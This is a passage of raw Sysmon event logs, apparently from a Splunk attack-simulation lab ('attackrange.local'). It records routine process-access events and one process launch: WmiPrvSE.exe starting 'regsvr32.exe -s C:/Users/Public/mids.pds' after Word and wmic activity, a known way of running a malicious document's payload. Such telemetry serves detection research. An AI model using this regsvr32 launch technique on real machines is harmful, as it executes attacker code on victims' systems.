Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293162Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:34.075{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A66637C948F118F7AA02DDF71DD5935C,SHA256=53D3968DC50F8F688C8746212CF44F557ECF40B5D1C580CB96C591BE6A25CA4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441509Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:35.985{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B66DADA8904F18F7BF88DCD1A7ABFFBF,SHA256=3ABFE30D63A8D83E05E88F7731763D253864B7BDFEFFA2C758F911745E2E92B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293166Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:35.573{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C614BF37348128CC9C502D7BEC266226,SHA256=1CDB6DC21A676468B7FEE331799697FAEF63AB84B91F451D79FDFB02FB37B113,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441508Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:35.261{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441507Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:35.261{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293167Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:36.620{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9092C46E7AB37524347D624629C20AA9,SHA256=7266A3C17E6E2DC345732FC127EB5236BC260A4BAA437F80352EF3BCD13C37D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441511Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:36.262{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441510Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:36.262{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441514Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:37.263{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441513Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:37.263{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441512Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:37.013{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CDE6EA94641A66AFD359DE4BB7CB694,SHA256=913096C7CFA6336060E639CEB7056C47682CAFD3E8785E090E6B0D32A5AC544F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293208Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.458{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02C1-6088-222A-00000000BB01}6060C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293207Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.458{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02C1-6088-222A-00000000BB01}6060C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293206Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.442{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293205Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.442{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293204Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.442{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293203Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.442{BEA10069-D4AB-6086-4301-00000000BB01}33842040C:\Windows\system32\csrss.exe{BEA10069-02C1-6088-222A-00000000BB01}6060C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293202Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.420{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293201Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.420{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293200Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.420{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293199Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.420{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293198Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.420{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-02C1-6088-222A-00000000BB01}6060C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293197Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.420{BEA10069-028A-6088-082A-00000000BB01}58404732C:\Windows\system32\wbem\wmiprvse.exe{BEA10069-02C1-6088-222A-00000000BB01}6060C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274 154100x8000000000000000293196Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.435{BEA10069-02C1-6088-222A-00000000BB01}6060C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEregsvr32.exe -s C:/Users/Public/mids.pdsC:\Windows\system32\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x8000000000000000293195Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.405{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293194Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.405{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293193Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.389{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293192Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.389{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293191Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293190Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293189Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293188Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293187Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 